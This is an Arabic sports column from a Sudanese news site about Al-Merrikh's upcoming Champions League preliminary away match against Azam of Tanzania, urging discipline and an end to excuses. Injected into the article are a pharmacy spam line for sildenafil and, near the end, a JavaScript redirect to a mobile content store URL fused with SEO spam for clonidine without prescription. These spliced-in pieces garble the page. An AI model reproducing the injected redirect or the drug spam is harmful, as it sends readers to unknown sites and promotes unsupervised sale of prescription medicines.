سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

محمد كامل يكتب بعنوان ما بين الحلم والخوف على المريخ..!!

10
ما بين الحلم والخوف على المريخ..!!محمد كامل
* نواصل اليوم ما انقطع من حديث بالأمس عن مباراة المريخ الأولى في تمهيدي رابطة أبطال أفريقيا المرتقبة أمام عزام التنزاني والمحدد لها عصر الأحد المقبل.. واعتقد أن الفرصة لا تزال قائمة أمام مريخنا العملاق للعودة بنتيجة إيجابية تقرّبه من العبور..!!
* وعلى الرغم من آرائنا السابقة عن فترة الإعداد ومستوى الفريق الذي ظهر به خلال المباريات الأربع في مسابقة الدوري الممتاز، إلاّ أن العشم يبقى قائماً، والرغبة في العودة بنتيجة إيجابية يظل هو المراد..!!
* الانضباط يجب أن يكون هو عنوان تعامل لاعبينا مع لقاء الأحد الصعب، كما أن احترام الفريق المنافس (عزام) والتعامل معه بالفهم المطلوب، والاعتراف برغبته الكبيرة وسعيه لتحقيق الفوز على المريخ سيكون هو المدخل الأول الايجابي للأحمر..!!
* على لاعبي المريخ، الذين غادروا مع البعثة فجر اليوم، ترك كل ما ردده البعض سواء عبر الصحف أو غيرها، خاصة أولئك الذين حاولوا إيهامنا بسهولة المباراة، عليهم ترك تلك الخزعبلات خلف ظهورهم..!!
* لقد اقتربت ساعة الامتحان واعتقد أن الجهاز الفني مطالب اليوم قبل الغد بتصدير كل ما يلزم من إحساس بالمسؤولية، وقوة المنافس وطموحه اللا محدود، إلى قلوب اللاعبين ولو من باب أنهم هم من يتحملون المسؤولية المباشرة..!!
* الظروف المناخية التي تعيشها دار السلام، وأرضية الملعب الصلبة، وتدخلات الحكام المنتظرة من الشماعات التي ظلت فرقنا السودانية تُعلّق عليها الهزائم، وعليه نتمنى أن تجد تلك (الفرمالات) الحلول اللازمة من جانب البعثة الإدارية..!!
* الأخطر من كل ذلك يتمثل في الطريقة التي سيتعامل بها الإعلام السوداني مع النتيجة التي ستنتهي عليها المباراة.. والتي نعتقد أنها ظلت تمثل الخطر الدائم والمتسبب الأول والمباشر في سقوط أنديتنا عموماً والمريخ على وجه التحديد..!!
* السيناريوهات التي سقط فيها المريخ بملعبه ووسط جماهيره يجب أن تكون حاضرة خاصة على شاكلة تلك التي تابعناها أمام كمبالا سيتي والإحساس الخرافي بالاطمئنان للعبور والذي تحول إلى كابوس داخل الملعب..!!
* نتيجة مباراة الأحد لا ولن تخرج عن الاحتمالات الثلاثة المحفوظة والمعروفة في المسابقات الرياضية عموماً وكرة القدم على وجه الخصوص، وهي فوز وهزيمة وتعادل لكن تبقى ردة الفعل المنطقية هي المطلب الأساسي..!!
* إننا نتطلع ونتمنى من الله العلي القدير أن يلهم إعلامنا ومجلس إدارة المريخ وقادة البعثة الإدارية ولاعبيه وجهازه الفني السلبي، إلى استخلاص الدروس والعبر المريرة التي مر بها المريخ وتوظيفها في اتجاه المصلحة العامة..!!
* نتمنى أن تكون مباراة عزام المرتقبة هي البداية الحقيقية لانتفاضة المارد المريخي وعودته العملية لوضعه السابق كـ(مُرعب وجلّاد) لأندية أفريقيا.. يصول ويجول وتسعى جميع الأندية لتحاشي التباري معه بما فيها الكبيرة..!!

buy sildenafil citrate | sildenafil citrate 100mg online – realpharmacyx

* تخريمة أولى: كفانا البحث عن الأعذار وتعليق السقوط على شماعة ظلم التحكيم وسوء المعاملة والأمطار وغير ذلك من الخزعبلات التي ما صارت تقنع رضيعاً ولم تكن في يوم من الأيام عائقاً أمام الأبطال..!!
* تخريمة ثانية: نترقب انتفاضة المريخ وعودته بالصورة المثالية التي عرفناه بها مارداً جباراً لا يختلف أداء لاعبيه ولا يتراجع سواء لعبوا داخل ملعبهم أو في مجاهل القارة..!!
* تخريمة ثالثة: نتمنى ذلك ونحلم بواقع جديد لفتية الأحمر الأشاوس وفي ذات الوقت نجد أنفسنا نعاني الخوف من أن تتحول أمنياتنا تلك إلى سراب..!!

 

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; bing.com-[en-us];cheap clonidine without prescription;http://brooklynne.net;http://brooklynne.net/profiles/blogs/clonidine-without-prescription-pharmacy-can-buy-clonidine-online;clonidine without prescription pharmacy – can buy …;clonidine without prescription pharmacy – can buy clonidine online. want clonidine with discount? top offers clonidine online, click here!?

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.